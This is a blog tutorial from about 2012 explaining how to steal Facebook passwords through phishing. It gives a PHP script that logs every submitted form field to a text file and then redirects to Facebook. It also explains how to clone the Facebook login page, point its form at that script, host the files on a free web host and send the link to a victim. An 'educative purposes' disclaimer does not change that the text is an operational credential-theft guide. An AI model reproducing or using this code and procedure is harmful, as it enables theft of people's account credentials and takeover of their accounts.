How to Hack Facebook using Phishing ~ 2012

Note: Phishing is illegal. This tutorial is only for educative purposes.

Facebook Phishing 2012

Well firstly i will be breifing what phishing is for those who are currently unaware of it.
According to Wikipedia, Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

In facebook phishing, the attacker creates a fake page resembling Facebook.com where victims enter their passwords and id's in order to login. By the time the page loads and redirects the victim to the original facebook page, his/her password and id gets saved in the attackers web server.

Now we will go straight into the tutorial segment.
Well we will be actually needing two files in this whole tutorial

1. A php file called login.php. This php file plays the cheif role in extracting and storing the password.
2. Index.html which is the edited fake page and is very similar to the original fb homepage.

Step 1. Creating the php file

Open notepad and  paste the following lines there... and save it with name login.php

header ('Location: http://www.facebook.com/appcenter');
$handle = fopen("facebook.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Step 2.Creating Index.html Page

Firstly open Facebook.com in your browser. After it loads completely, save it to a folder.

Facebook Phishing 2012

Open the .html\.htm file you just downloaded, using notepad and go to Edit>Find and type in the search box:
method="post" and press Find.

Facebook Phishing 2012

When the searched keyword is shown, notice that just before it, there is something written like: action="www.facebook.............". Replace the text within the quotes with login.php.(See the Image)
Facebook Phishing 2012

Bingo !! Your Phishing page is now ready !

Step 3. Uploading Files to Free Web Hosting

Now you have to upload the above mentioned files in an online web hosting provider.
For this tutorial, I will be using www.000webhost.com.

a. Firstly go to the site and signup for a free account.

000webhost free webhosting

b. After you have created your account, go to Control Panel>File Manager. 

file manager

c. Navigate and go to the root folder and delete if you find any pre-existing files.

d. Now click "Upload" and select the two files, namely index.html and login.php

~~ Now you are ready to strike ~~

e. Now copy the link of sub-domain you selected while registering for the hosting account and give it to the victim. Whenever someone tries to login through your phishing page, the username and password is saved in a text file in your file manager(see step b).

Facebook Phishing page

Please Give Your Comments Below. Your Comments Are Very Important to Us.



Post a Comment

Our free services:

Get our toolbar!

Related Posts Plugin for WordPress, Blogger...



Total Pageviews

Please Visit This Add


Copyright @ CODEXTRA PVT. LTD. Powered by Blogger.